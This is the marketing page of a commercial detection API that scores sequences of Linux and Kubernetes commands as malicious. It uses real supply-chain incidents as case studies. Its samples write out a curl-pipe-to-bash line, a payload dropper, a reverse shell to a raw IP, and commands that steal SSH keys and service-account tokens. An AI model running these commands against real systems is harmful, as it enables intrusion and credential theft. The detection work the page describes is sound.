Switzerland Swiss Made
Get API Key →
Free SaaS API  ·  No credit card required

Sequence-aware exec classification
for Kubernetes and Linux

Send your execv events. Get a malicious/benign verdict on the full command chain — with per-command attribution showing exactly which commands drove the score. No rules to write. No signatures to maintain.

Get API Key → See Real Attacks It Catches
90% TPR @ 0.1% FPR · < 100ms classification · Attack chain highlighting · Self-hostable
Integrates with Tetragon · Falco · Splunk · Elastic · Microsoft Sentinel · Custom eBPF
Real-World Attacks

These attacks happened. Would you have caught them?

Each of these incidents shares the same structure: malicious commands hidden inside otherwise legitimate shell scripts, invisible to signature-based tools, running undetected for weeks or months. This is precisely the threat Protet is built to detect.

2021 CISA Advisory

Codecov Supply Chain Attack

A single curl line was injected into a 400-line legitimate bash uploader script. It ran silently in CI pipelines for two months, exfiltrating environment variables — credentials, API tokens, signing keys — from every pipeline that sourced it.

Victims: Twilio, HashiCorp, Confluent, U.S. Department of Homeland Security.

Why tools missed it: no signature matched. The script was legitimate 99.75% of the time. One malicious curl in 400 lines — a 0.25% payload density. Protet classifies the sequence. That curl to an external IP combined with the surrounding env access patterns scores high regardless of whether the URL is known.

March 2025 23,000 repos affected

tj-actions/changed-files Compromise

Malicious shell code was injected into a widely-used GitHub Actions step. It dumped CI runner memory — including secrets, tokens, and environment variables — to the workflow log, readable by anyone with repo access.

Affected: 23,000 GitHub repositories across the ecosystem.

Why tools missed it: the action itself looked normal. The memory dump command was the only malicious element in an otherwise legitimate pipeline step. A sequence classifier sees the combination of memory access and outbound data movement as a high-risk pattern.

March 2024 CVE-2024-3094

XZ Utils Backdoor

A backdoor was hidden inside Autoconf and bash build scripts for two years, nearly reaching every glibc Linux system globally. It was caught accidentally by a Microsoft engineer noticing SSH connection slowness — not by any security tool.

Targeted: systemd-linked sshd on Debian, Ubuntu, Fedora, openSUSE.

Why tools missed it: no signature existed. The malicious build script behaviour was indistinguishable from noise to any rule-based system. Caught by a human, two years after insertion.

"Codecov's bash script ran in your CI pipeline for two months before anyone noticed. Would you have caught it?" See the benchmark →
Features

Designed for how attacks actually work

Sequence-Aware Classification

Commands are classified as a chain, not in isolation. A single curl to an external IP is noise. That same curl preceded by env, cat /etc/passwd, and id is an attack. Protet sees the difference.

Attack Chain Highlighting

Every verdict comes with the specific commands that form the malicious chain, extracted from the surrounding legitimate activity. Not a black box — evidence your analyst can act on and attach to an incident ticket.

REST API + WebSocket

Submit events via POST /events. Results stream to WebSocket subscribers in real-time. Works with Splunk, Elastic, Sentinel, PagerDuty, or any JSON consumer. No custom integration layer needed.

SaaS or Self-Hosted

The cloud API is free. For environments where data cannot leave your network — air-gapped clusters, regulated industries — the on-premise option keeps everything inside. Same API, different deployment.

How It Works

From exec event to flagged attack chain in milliseconds

01

Capture

An eBPF sensor (Tetragon, Falco, or custom) captures execv events from your containers or Linux servers.

02

Forward

POST each exec event to the Protet API. Only the command string and minimal context — no full logs, no log forwarding infrastructure needed.

curl -X POST https://api.protet.io/events \
  -H "api-key: YOUR_KEY" \
  -d '{"cmd":"curl evil.site|bash",
       "context":{"entity_id":"ns/pod"}}'
03

Classify + Explain

Protet maintains a sliding window per entity, classifies the chain, and returns a verdict with the flagged attack chain highlighted. Results stream to your WebSocket subscribers or SIEM in real-time.

{
  "classification": "malicious",
  "malicious_probability": 0.97,
  "flagged_commands": [
    "curl evil.site | bash",
    "chmod +x /tmp/.x"
  ]
}
Explainability

Not just a score — the exact attack chain

A black-box "malicious: true" is an alert. A highlighted chain is evidence. When Protet fires, it returns the specific commands that form the malicious chain — extracted from the surrounding legitimate activity. Your analyst sees exactly what to investigate, before touching a terminal.

POST /explain · response
MALICIOUS score 0.94
$ pip install -r requirements.txt
$ npm ci
$ curl -s http://185.220.101.1:4444/payload -o /tmp/.x
$ chmod +x /tmp/.x
$ npm run build
$ bash -i >& /dev/tcp/185.220.101.1/9001 0>&1
$ aws s3 sync dist/ s3://my-bucket/
3 of 7 commands identified as the attack chain.
01
Know what fired, not just that it fired. The reverse shell and dropper commands are isolated as the attack chain. The surrounding legitimate commands — pip install, npm ci — are excluded. Protet reads the full sequence and surfaces only what's malicious.
02
Evidence, not just an alert. Attach the flagged chain directly to your PagerDuty incident, Jira ticket, or Slack message. Your on-call engineer sees exactly what to investigate before touching a terminal.
03
Works on sparse payloads. The payload can be 1 command in 40 — 2.5% density. Protet still isolates the malicious chain and ignores the surrounding noise. This is exactly the Codecov scenario: one bad line among hundreds of legitimate ones.
Try it in the live demo →
Architecture

Enhances your existing security stack

Protet adds semantic classification on top of your existing telemetry — Tetragon, Falco, or any custom eBPF sensor. It complements, not replaces.

Protet Kubernetes security architecture: Tetragon and Falco eBPF sensors forward execv events to the Protet classification API, which streams real-time threat results to SIEM (Splunk, Elastic, Sentinel), alerting pipelines, and WebSocket consumers
How it fits in

Falco and Tetragon capture. Protet classifies.

Falco and Tetragon are excellent at what they do — capturing system-level events with near-zero overhead. Protet adds a different layer: sequence-based classification across the full command chain from each entity, plus the exact attack chain highlighted.

Falco / Tetragon
Protet
Role
eBPF sensor & rule engine
Classification layer
Detection method
Rule-based (signature matching)
Sequence-aware ML classifier
Scope per alert
Single event at a time
Sliding command window per entity
Novel attack patterns
Requires a new rule to be written
Detected without rules
Sparse payloads (Codecov-style)
Misses — no rule matches a single benign-looking line
Detected — sequence context identifies the anomaly
Explains why it fired
No — rule name only
Yes — highlights the exact attack chain
Runs on
Kernel agent, every node
API service (cloud or on-premise)
Use together?
Yes — provides the event stream
Yes — consumes and enriches it

Protet does not capture events. You still need an eBPF sensor. The two are complementary by design.  See benchmark vs ClamAV, YARA, Semgrep, and Claude Sonnet →

Live Demo

See the exact attack chain highlighted

A real attack chain window is sent as a single request to the API. The explainability engine pinpoints the minimal set of commands responsible for the malicious classification — extracted from the surrounding legitimate activity.

pod/api-server · root@demo-node-1
POST /explain · explainability API
Click Analyse to run the explainability API →
Use Cases

Concrete scenarios. Real output.

Each scenario follows the same pattern: commands that look individually harmless, a chain that doesn't match any known signature, and a Protet verdict with the attack chain highlighted.

Kubernetes · compromised sidecar

Pod RCE → Reverse Shell

An attacker gains RCE in a Django sidecar. They run id, cat /etc/passwd, then open a reverse shell. No single command trips a Falco rule — together they score 0.94.

Why existing tools miss it: individually benign commands followed by a reverse shell that uses a variant port. YARA has no signature. ShellCheck sees valid syntax.
MALICIOUS 0.94 bash -i >& /dev/tcp/... · cat /etc/passwd · id
CI/CD · GitHub Actions / GitLab CI

Supply Chain Implant (Codecov-style)

A compromised dependency executes wget + chmod +x + runs a binary during an otherwise normal build pipeline. 1 malicious command in 40 legitimate ones.

Why existing tools miss it: the script is 97.5% legitimate. Signature tools see no known-bad pattern. The malicious payload uses a fresh IP with no reputation.
MALICIOUS 0.88 curl … -o /tmp/.x · chmod +x /tmp/.x · /tmp/.x
Linux · bare metal / VM

SSH Key Exfiltration

An attacker with shell access reads ~/.ssh/id_rsa then POSTs it via curl. No known malware signature. Protet sees the access-then-exfiltrate sequence and scores it high.

Why existing tools miss it: both commands are individually valid shell operations. No signature covers this specific pattern. auditd logs them but doesn't correlate.
MALICIOUS 0.91 cat ~/.ssh/id_rsa · curl -X POST … -d @/tmp/key
Kubernetes · service account abuse

K8s Credential Theft

A pod reads its service account token, queries the API server for secrets, then exfiltrates. A slight variation on the known pattern — enough to evade YARA rules, not enough to fool a sequence classifier.

Why existing tools miss it: YARA rules target exact byte patterns. Minor variation in the curl flag order or URL structure produces zero rule matches.
MALICIOUS 0.96 cat …/serviceaccount/token · kubectl get secrets · curl … exfil
FAQ

Common questions

What does the API payload actually look like?
One POST per exec event. Required fields are cmd (the command string) and context.entity_id (your pod or host identifier). Protet handles windowing internally — you don't batch commands yourself. The sync response includes classification, malicious_probability, and command_window. The /explain endpoint adds flagged_commands with per-command contribution scores. Full schema in the docs →
How accurate is the detection?
90% TPR at 0.1% FPR on the held-out test set — outperforming ClamAV (7%), YARA (0%), Semgrep (0%), ShellCheck (0%), and Claude Sonnet 4.6 (2%) at the same threshold. On the hardest partition — sparse payloads with <5% malicious commands — Protet holds at 85% while the best ML baseline drops to 20%. No classifier is perfect. We recommend using it as an enrichment layer alongside your existing alerting. Full benchmark →
Does Protet replace Falco or Tetragon?
No — and it's not trying to. Tetragon and Falco capture exec events from the kernel. They alert on single events matching a rule. Protet receives those events and classifies the full command sequence per entity — detecting attack progressions that no single command would trigger on its own. You still need an eBPF sensor. Protet adds the classification layer on top.
What does an explanation response look like?
POST the command list to /explain. The response includes baseline_score (overall malicious probability), flagged_commands (the minimal set responsible for the verdict), and found_at_order (at which command in the sequence the classification threshold was crossed). Each flagged command can be ranked by its contribution to the final score. See the live demo on this page for a real example, or the docs for the full schema.
What is the latency on the SaaS API?
Classification latency is typically <100ms for the inference step. End-to-end latency depends on network round-trip time to the API endpoint. The SaaS API does not offer a guaranteed SLA — latency is best-effort. For latency-sensitive or compliance-heavy environments, the on-premise option removes the network hop entirely.
Is my data private? What do you store?
When using the cloud API, exec event metadata (the command string and context fields you send) is processed in-memory and discarded after classification. No persistent log storage. If that's not sufficient for your threat model, the on-premise option keeps all data inside your network.
Can I integrate this into my SIEM?
Yes. Subscribe via WebSocket and forward structured classification events to Splunk, Elastic, Microsoft Sentinel, or any system that accepts JSON. The REST API works for pull-based integrations. The explanation output is structured JSON — suitable for attaching directly to PagerDuty alerts or Jira tickets.
Will the SaaS API always be free?
Currently free with generous default limits (100,000 events/month, 3,000 req/s per key). If pricing changes, existing users will receive advance notice and a migration window — we won't cut off access without warning.

One POST request to your first classification

Free SaaS API. Unlimited keys. No infrastructure changes. No rules to write.

Get API Key → See the Benchmark